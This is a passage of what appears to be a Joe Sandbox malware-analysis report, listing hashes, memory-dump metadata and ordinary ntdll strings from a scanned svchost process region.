• Opcode ID c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7; Instruction ID d3de3aa9678e021175f0947359b12a437c95e03ed9ad89388b6dc1abe070a9ed; Instruction Fuzzy Hash 38D0223231243093CB28E690A904F63AD059B81AA4F1B002C380AD3A00C8048C43CAE0
• Opcode ID 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444; Instruction ID 8bd5c1e0bd502fe523ba95dac60c23bdcf5ef5e396790d1cbbcdc18959c8f268; Instruction Fuzzy Hash 9CD0C935612E80CFD71BCF0DC6A4B16B3B8BB44B44F8504D0E501CBB61D66CD940CE04
• Opcode ID 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121; Instruction ID 52208dc3bd3bb9504633463a0321448ccbdca99ade4cec2e0de288df4d999b65; Instruction Fuzzy Hash 22D05E35945AC4CFE727CB18C265B907BF8F705B40F890098E04247BA2C37C99C4CB50
• Opcode ID a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53; Instruction ID 142202c581ec9fb6b0fdeb4b43bf4ed0287658d7f429c13d5e3ffbf13a924662; Instruction Fuzzy Hash 79C08C3B290748AFC712EF98CD01F027BA9EB98B40F104021F3048B670C631FC20EA88
• Opcode ID b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee; Instruction ID 7b133768ff382e91061a2b238a6dde3637b3062e847eb15f81908f712d765a28; Instruction Fuzzy Hash 40D01236100248EFCB01DF41C890D9A772AFBD8710F148019FD190B6108A31ED62DA50
• Opcode ID 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93; Instruction ID f7560e59d52c7628f4e291dd9aaa5755ee699e022ef6aff0f5a2646e5223fa01; Instruction Fuzzy Hash FBC04879B01A418FCF15EB2AD394F8977E8FB48740F2918D0E805CBB21E624E811CA10
• Opcode ID 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0; Instruction ID 809977f9366c9fbda9797c0c7b21ec1f7a491882b24f294b8462c3611699f634; Instruction Fuzzy Hash 15900231605804129140B65848C4586400697E4301B95C111E0424658D8B548A565361
• Opcode ID 5ffe97900863f1f6ff1fb622b6e799d50167bfc579d0f4b73415c3792cafc80a; Instruction ID 1243aa40728cc219c0e853640e3437e38871ba296fc17e87c24475fa547900fe; Instruction Fuzzy Hash C390022120184842D140B7584844B4F410687E5302FD5C119A4156658DCA5589555721
• Opcode ID 3484f65dd6c4792e7194fb63c30e54d09e656ec6a7b9dc6b120d8ad9b1bb012f; Instruction ID dde3a08161755d95cfd4ceaf3303ddde0fd82be681a6119467755975f2868bc9; Instruction Fuzzy Hash 3690022124140C02D140B65884547470007C7D4701F95C111A0024658E87568A6566B1
• Opcode ID 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8; Instruction ID 2adb74a592e17b02683643e347870d444cf33e8ca16646f475d114a35ec6c132; Instruction Fuzzy Hash CD900261601504424140B6584844446600697E53013D5C215A0554664D875889559269
• Opcode ID 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa; Instruction ID 45fe79f86ada4a08304903ed8f6a16fdb893b5eff3353011f0b806c660d03e00; Instruction Fuzzy Hash 5190023120544C42D140B6584444A86001687D4305F95C111A0064798E97658E55B661
• Opcode ID c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4; Instruction ID 9b1f26a2aaeee0eb726926c5200498220773c51982f232afdb7d29ea440c4cce; Instruction Fuzzy Hash D890023120140C02D180B658444468A000687D5301FD5C115A0025758ECB558B5977A1
• Opcode ID ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4; Instruction ID e255ac6017c0f8023d8087a68b876ccfe483b10b3dd1a74a8bc27fc882ffe6f0; Instruction Fuzzy Hash 3E90023160540C02D150B6584454786000687D4301F95C111A0024758E87958B5576A1
• Opcode ID 2e336c2bae22b68fa82394d434983f0582b9d98caba37d89976c90496bba4b11; Instruction ID d27d50eb9e267a84cd43bdfbd004b7f2e4d9746ac91feac522289bbceca1fa9f; Instruction Fuzzy Hash 6990023120140C02D104B65848446C6000687D4301F95C111A6024759F97A589917131
• Opcode ID 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d; Instruction ID 1876c73531c03fd5f33fb72b88d5b2296e29a5202e95ac72e0d702bfd56775b3; Instruction Fuzzy Hash 87900225221404020145FA58064454B044697DA3513D5C115F1416694DC76189655321
• Opcode ID 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4; Instruction ID 5c99afa0f746733a33a2d0d181c16d202c37b6c620a31395c28dca174068b168; Instruction Fuzzy Hash FA900435311404030105FF5C07445470047C7DD3513D5C131F1015754DD771CD715131
• Opcode ID 4fe177197ea429e200ca16a264de4a8484007e0c328eaa6aceb1b52ffcc73c68; Instruction ID a5514a58808e01875ab92ee86d1382bcba904d50a5c1e4240ddb71d473100e17; Instruction Fuzzy Hash 099002A1201544924500F7588444B4A450687E4301B95C116E1054664DC66589519135
• Opcode ID 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0; Instruction ID b91b390339b3ce60c56b9f67de7451120a0410e939cc0a370b205825e8be5faf; Instruction Fuzzy Hash AD90022124545502D150B65C44446564006A7E4301F95C121A0814698E869589556221
• Opcode ID bc50fdbdb35479085fcb93b29b35b7546b92f2e75d72c13a61f241a31d19a837; Instruction ID dedf5f136aad4d1561ab92e674ea2aae08af5c11f3155595e8e5fe61118c5127; Instruction Fuzzy Hash 4090026121140442D104B6584444746004687E5301F95C112A2154658DC6698D615125
• Opcode ID 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b; Instruction ID 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24; Instruction Fuzzy Hash 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                          • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                          • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                          • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                          • Instruction ID: 08ba8383abdcda55cd4713981f4300cb836be1f6ecaf7edb84538028a7d6f747
                                          • Opcode Fuzzy Hash: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                          • Instruction Fuzzy Hash: 9C90023120180802D100B6584848787000687D4302F95C111A5164659F87A5C9916531
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                          • Instruction ID: 6005ef6f093c2f0f46cd85166790aa9ef261c7d3b9e208cde4e5076d827fb4b6
                                          • Opcode Fuzzy Hash: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                          • Instruction Fuzzy Hash: ED900221601404424140B66888849464006ABE5311795C221A0998654E869989655665
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                          • Instruction ID: 3aa003d67dcc11ba95c3e0c244e3ac4b03cce96cb405c8ed2288800ee14a5ad2
                                          • Opcode Fuzzy Hash: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                          • Instruction Fuzzy Hash: FB90023120180802D100B658485474B000687D4302F95C111A1164659E876589516571
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                          • Instruction ID: ac9a55e02d3ca15807a57236cef1689dc94ddc8aecbb1cf2f8b764d3eb27591c
                                          • Opcode Fuzzy Hash: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                          • Instruction Fuzzy Hash: DB90022130140802D102B6584454646000AC7D5345FD5C112E1424659E87658A53A132
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                          • Instruction ID: 2009c4b21c502db950d934bcdac7fa63bf7a7341f15f1866729f363aeed19f2c
                                          • Opcode Fuzzy Hash: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                          • Instruction Fuzzy Hash: 3990026120180803D140BA584844647000687D4302F95C111A2064659F8B698D516135
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                          • Instruction ID: 0b88e1cda8a68370aea70bd6f0237e7b1c857bb963b2a18813f875aa3ddde019
                                          • Opcode Fuzzy Hash: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                          • Instruction Fuzzy Hash: DD90027120140802D140B6584444786000687D4301F95C111A5064658F87998ED56665
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                          • Instruction ID: a6601a38d3994d050a93b4310d5cfa758d354a5252bd310f3d630d69f2eca991
                                          • Opcode Fuzzy Hash: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                          • Instruction Fuzzy Hash: 8E90022160140902D101B6584444656000B87D4341FD5C122A1024659FCB658A92A131
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                          • Instruction ID: b5c75c6b0858e1d826eefaf0b3a12823685a81f004b5b2af19a0b9a98123ae75
                                          • Opcode Fuzzy Hash: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                          • Instruction Fuzzy Hash: 3F90023520140802D510B6585844686004787D4301F95D511A042465CE879489A1A121
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                          • Instruction ID: 550db0ed94396a8b97b0d23723babb47a8ca8f19d5d513dc8a3aec6ce304e473
                                          • Opcode Fuzzy Hash: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                          • Instruction Fuzzy Hash: 2F90022130140403D140B65854586464006D7E5301F95D111E0414658DDA5589565222
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                          • Instruction ID: e94c90bdc3197e2306ab4c24857d614b78746af37834f9dfb48ed2615b8d33ab
                                          • Opcode Fuzzy Hash: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                          • Instruction Fuzzy Hash: BD90022120544842D100BA585448A46000687D4305F95D111A1064699EC7758951A131
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                          • Instruction ID: eb3b26cc62c91c58aa2bcf805b03df034cd8fd138102a157ab3551ec396ee687
                                          • Opcode Fuzzy Hash: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                          • Instruction Fuzzy Hash: 7390022921340402D180B658544864A000687D5302FD5D515A001565CDCA5589695321
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                          • Instruction ID: ad16e4712f401959e33ff3f40102739bbbe3a81c3a51bfd54614708970c35028
                                          • Opcode Fuzzy Hash: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                          • Instruction Fuzzy Hash: 38900231202405429540B7585844A8E410687E5302BD5D515A0015658DCA5489615221
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                          • Instruction ID: 3cd3554952be4e277cf9caf681f4d01bb0d632706e383e7fb4c57cb3c80cca1e
                                          • Opcode Fuzzy Hash: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                          • Instruction Fuzzy Hash: DE900221242445525545F6584444547400797E43417D5C112A1414A54D86669956D621
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                          • Instruction ID: c0a3e2716ec8ae41761c3557174784ccfb59649f7173eb5b1e8d1de5d590b5a2
                                          • Opcode Fuzzy Hash: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                          • Instruction Fuzzy Hash: B490023124140802D141B6584444646000A97D4341FD5C112A0424658F87958B56AA61
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                          • Instruction ID: a73d70b26dc13e65620a629f34f1aa02e7663319655713b10b705c0158acf1b1
                                          • Opcode Fuzzy Hash: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                          • Instruction Fuzzy Hash: 1890023120140C42D100B6584444B86000687E4301F95C116A0124758E8755C9517521
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                          • Instruction ID: 18c4a8923d9017b505c535c34a9086cceea6c34b9e5366c63e0909e620ee77c9
                                          • Opcode Fuzzy Hash: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                          • Instruction Fuzzy Hash: 6190023120140803D100B6585548747000687D4301F95D511A042465CED79689516121
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                          • Instruction ID: 48922546de11365eb2e63827ff35ded3a45b52560a1eb52c2694c6cd9b21ee5b
                                          • Opcode Fuzzy Hash: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                          • Instruction Fuzzy Hash: A590022160540802D140B6585458746001687D4301F95D111A0024658EC7998B5566A1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                          • Instruction ID: 4947b2c852d1bbb9d6bcd5b7e1280a91f65a64248abaac80ad49a95163ad975f
                                          • Opcode Fuzzy Hash: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                          • Instruction Fuzzy Hash: 5290023120140802D100BA985448686000687E4301F95D111A5024659FC7A589916131
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 829bb9b762ae8f925790c83f671aa4208fa631a060d9be7762ffabc54cb6b263
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                          • Instruction ID: 282589b5143b222d48a16e6871b8351cf7c825e08d96a27db41d0a5a55bc5096
                                          • Opcode Fuzzy Hash: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                          • Instruction Fuzzy Hash: 2F51D9B5A04516BFCB10DF9DC9A097EF7B8BB08200B58866AE4A5D7741D334DE44CBE4
                                          Strings
                                          • ExecuteOptions, xrefs: 036A46A0
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                          • Execute=1, xrefs: 036A4713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                          • Instruction ID: 05985d717170dcfd592e2691e2d81588a5619331c743dbb5f3b07073dd2b2b65
                                          • Opcode Fuzzy Hash: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                          • Instruction Fuzzy Hash: 76514935A003097ADF21EBA9DC89FAE77B8EF05348F0800ADD505EB291EB719E518F54
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: 4d750a17a3fadbc85023cf9ac478ac7b3aee9617a1255f6828546db23ea22687
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: FA81F170E052499EDF28CF68C9957FEBBB6AF45320F9C425ED861AB390C7308851CB54
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                          • RTL: Re-Waiting, xrefs: 036A031E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                          • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                          • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                          • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                          Strings
                                          • RTL: Resource at %p, xrefs: 036A7B8E
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                          • RTL: Re-Waiting, xrefs: 036A7BAC
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                          • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                          • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                          • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 036A72A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                          • RTL: Re-Waiting, xrefs: 036A72C1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                          • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                          • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                          • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                          Strings
                                          Memory Dump Source
